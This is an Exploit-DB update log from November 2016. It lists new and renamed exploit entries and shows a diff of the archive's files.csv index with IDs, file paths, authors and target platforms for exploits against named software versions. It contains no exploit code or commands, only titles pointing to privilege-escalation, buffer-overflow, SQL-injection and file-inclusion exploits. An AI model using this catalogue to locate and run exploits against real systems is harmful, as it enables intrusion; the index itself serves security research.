DB: 2016-11-16

8 new exploits

MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service

MailEnable Professional/Enterprise 2.37 - Denial of Service
MailEnable Professional/Enterprise 2.37 - Denial Of Service

Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service

MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service

VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption
VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption

VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser
VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser

VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service

VideoLAN VLC Media Player - '.wav' File Memory Corruption
VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption
Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free
Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference
Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)

VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking

VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)
VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)

VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)
Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)

Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)

MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow

Versant Object Database 7.0.1.3 - Commands Execution Exploit
Versant Object Database 7.0.1.3 - Commands Execution

VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit
VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit
MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow
MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow
MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow

VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)
VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)

VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)

Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)

Disk Pulse Enterprise 9.0.34 - Buffer Overflow
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow

Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)

WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)

phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
QuickTalk forum 1.3 - 'lang' Local File Inclusion
QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion
QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion
QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion
Mambo Component com_Musica - 'id' SQL Injection
phpArcadeScript 3.0RC2 - (userid) SQL Injection
phpComasy 0.8 - (mod_project_id) SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
Mambo Component com_Musica - 'id' Parameter SQL Injection
phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection
phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection
XOOPS Module Glossario 2.2 - 'sid' SQL Injection
XOOPS Module wfdownloads - 'cid' SQL Injection
XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection
XOOPS Module wfdownloads - 'cid' Parameter SQL Injection
Joomla! Component Candle 1.0 - (cID) SQL Injection
QuickTicket 1.5 - (qti_usr.php id) SQL Injection
Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection
QuickTicket 1.5 - 'qti_usr.php' SQL Injection
Mambo Component eWriting 1.2.1 - (cat) SQL Injection
phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection
Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution
Mapbender 2.4.4 - (gaz) SQL Injection
Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection
phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection
Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution
Mapbender 2.4.4 - 'gaz' Parameter SQL Injection

phpBB Mod FileBase - 'id' SQL Injection
phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection
XOOPS Module Gallery 0.2.2 - (gid) SQL Injection
XOOPS Module My_eGallery 3.04 - (gid) SQL Injection
XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection
XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection

XOOPS Module tutorials - 'printpage.php' SQL Injection
XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection

easygallery 5.0tr - Multiple Vulnerabilities
EasyGallery 5.0tr - Multiple Vulnerabilities

phpArcadeScript 4 - (cat) SQL Injection
phpArcadeScript 4 - 'cat' Parameter SQL Injection

phpComasy 0.9.1 - (entry_id) SQL Injection
phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection

phpArcadeScript 4.0 - (linkout.php id) SQL Injection
phpArcadeScript 4.0 - 'id' Parameter SQL Injection

Myiosoft EasyGallery - 'catid' Blind SQL Injection
EasyGallery - 'catid' Parameter Blind SQL Injection
phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting
phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting
phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting
phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting
phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting

EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting

Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting

Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection

files.csv

@@ -500,9 +500,9 @@ id,file,description,date,author,platform,type,port
 3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0
 3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0
 3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0
-3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
+3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service",2007-02-14,mu-b,windows,dos,0
 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
-3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
+3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial Of Service",2007-02-14,mu-b,windows,dos,0
 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
@@ -700,11 +700,11 @@ id,file,description,date,author,platform,type,port
 5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
 5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0
 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0
-5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0
+5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service",2008-03-01,0in,linux,dos,0
 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0
 5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0
 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
-5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service",2008-03-11,ryujin,windows,dos,0
+5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service",2008-03-11,ryujin,windows,dos,0
 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
 5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0
@@ -1878,7 +1878,7 @@ id,file,description,date,author,platform,type,port
 16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0
 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0
 16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0
-16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
+16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0
 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
 16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
@@ -1965,7 +1965,7 @@ id,file,description,date,author,platform,type,port
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
-17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
+17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
 17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
@@ -4572,7 +4572,7 @@ id,file,description,date,author,platform,type,port
 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
 37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos,0
 37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
-37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0
+37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service",2012-08-02,Dark-Puzzle,windows,dos,0
 37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0
 37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
 37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
@@ -4910,7 +4910,7 @@ id,file,description,date,author,platform,type,port
 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0
 39165,platforms/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
 39169,platforms/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos,0
-39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
+39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
 39180,platforms/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39181,platforms/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39182,platforms/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
@@ -5262,6 +5262,9 @@ id,file,description,date,author,platform,type,port
 40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
+40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
+40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
+40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5844,7 +5847,7 @@ id,file,description,date,author,platform,type,port
 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
 6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0
 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
-6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
+6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
 6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0
 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
@@ -6453,7 +6456,7 @@ id,file,description,date,author,platform,type,port
 14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
-14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
+14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
 14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
 14756,platforms/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
@@ -6633,13 +6636,13 @@ id,file,description,date,author,platform,type,port
 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0
 16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
-16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
+16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
 16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0
 16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
-16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
+16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
 16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0
 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
@@ -6830,7 +6833,7 @@ id,file,description,date,author,platform,type,port
 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
-18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
+18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
 18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0
 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
@@ -7946,6 +7949,8 @@ id,file,description,date,author,platform,type,port
 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0
 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
+40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
+40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
@@ -8631,6 +8636,7 @@ id,file,description,date,author,platform,type,port
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
+40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9246,7 +9252,7 @@ id,file,description,date,author,platform,type,port
 3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0
 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0
 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0
-3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
+3397,platforms/windows/remote/3397.pl,"MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0
 3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0
 3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0
@@ -9544,14 +9550,14 @@ id,file,description,date,author,platform,type,port
 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0
 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow",2008-02-29,Elazar,windows,remote,0
 5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0
-5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0
+5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0
 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0
-5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
+5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0
 5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0
 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
